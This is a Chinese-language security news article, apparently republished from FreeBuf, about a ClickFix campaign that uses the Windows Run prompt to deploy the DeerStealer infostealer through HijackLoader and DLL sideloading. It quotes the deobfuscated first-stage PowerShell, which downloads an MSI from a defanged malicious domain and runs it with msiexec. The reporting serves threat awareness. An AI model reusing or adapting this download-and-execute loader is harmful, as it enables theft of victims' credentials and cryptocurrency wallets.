攻击者滥用Windows运行提示框执行恶意命令并部署DeerStealer窃密木马
研究人员发现一起复杂的恶意软件攻击活动,攻击者利用Windows内置的"运行"提示框传播DeerStealer信息窃取程序。该恶意软件通过钓鱼页面诱骗用户执行PowerShell命令,并采用高级混淆技术和隐藏基础设施架构规避检测。DeerStealer可窃取加密货币钱包、浏览器凭证及敏感数据,并在暗网以订阅制模式出售。 2025-6-16 23:43:36 Author: www.freebuf.com(查看原文) 阅读量:3 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

image

网络安全研究人员发现一起复杂的恶意软件攻击活动,攻击者利用Windows内置的"运行"提示框传播DeerStealer——这款功能强大的信息窃取程序专门窃取加密货币钱包、浏览器凭证和敏感个人数据。

新型社会工程攻击手法

该恶意活动展现了社会工程策略的演进趋势,攻击者将合法的Windows功能与高级恶意软件部署技术相结合,从而绕过传统安全防护措施。2025年5月持续活跃的该攻击活动采用名为ClickFix的技术,诱骗受害者通过Windows运行对话框自愿执行恶意PowerShell命令。

ClickFix初始访问途径

受害者通常会被重定向至精心设计的钓鱼页面,页面显示虚假错误信息或系统通知,诱使他们按下Windows+R组合键并粘贴看似合法的命令来"解决"虚构的问题。这种方法通过利用用户自身操作和受信任的系统进程,有效规避了众多安全控制措施。

暗网订阅制恶意软件服务

eSentire安全分析师通过其威胁响应部门(TRU)发现攻击者多次尝试部署该恶意软件,揭示了该活动的广泛性和技术实现的复杂性。研究人员发现这款也被称为XFiles的恶意软件正在暗网黑客论坛以订阅制模式出售,卖家"LuciferXfiles"提供的月费方案从200美元到3000美元不等,具体价格取决于功能集和服务内容。

DeerStealer是一个全能型数据窃取平台,能够窃取800多个浏览器扩展凭证,针对14种不同数字货币的钱包,并从Discord、Telegram、Steam及各类VPN客户端等流行应用中收集数据。其功能不仅限于简单的凭证窃取,还包括:

  • 加密货币地址替换的剪贴板劫持功能
  • 远程桌面控制的隐藏VNC访问
  • 样本间相似度仅50%的高级混淆技术

隐蔽的基础设施架构

该恶意软件使用名为"Gasket"的代理域名系统来隐藏真实的命令控制(C2)服务器位置,同时保持持久通信通道。结合其利用硬件标识符和系统时间戳对受害者设备进行指纹识别的能力,显示出攻击者对操作安全性和长期活动可持续性的重视。

高级感染机制与载荷部署

攻击链示意图

DeerStealer感染链始于受害者粘贴到Windows运行提示框中的混淆PowerShell命令。解码后的命令揭示了一个利用无文件攻击(Living-off-the-land)技术规避检测的多阶段部署过程。初始PowerShell脚本包含以下反混淆内容:

$AqEVu = $env:AppData;
function kWERDs($EIpoJdP, $wQmPq){curl $EIpoJdP -o $wQmPq};
function zPWQQKzb($CAvStqT){kWERDs $CAvStqT $wQmPq}
$wQmPq = $env:AppData + '\now.msi';
zPWQQKzb "hxxps://luckyseaworld[.]com/now.msi";
msiexec.exe /i $wQmPq;;

该脚本利用合法的curl.exe实用程序从被入侵或恶意的域名下载名为"now.msi"的Microsoft安装程序包,然后使用Windows Installer服务执行。MSI文件作为HijackLoader的投放器——这款2023年出现的复杂恶意软件加载器采用隐写术将其配置数据隐藏在加密的PNG图像中。

部署后,HijackLoader将多个文件复制到C:\ProgramData目录,并执行一个经过DLL劫持技术篡改的、具有合法数字签名的COMODO Internet Security二进制文件。该合法可执行文件加载恶意版本的cmdres.dll,其中包含C运行时的钩子,将执行流重定向到恶意软件的第一阶段,从而利用受信任的二进制文件作为恶意代码执行的载体,同时保持合法系统活动的表象。

参考来源:

Threat Actors Abuse Windows Run Prompt to Execute Malicious Command and Deploy DeerStealer

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/database/435131.html
如有侵权请联系:admin#unsafe.sh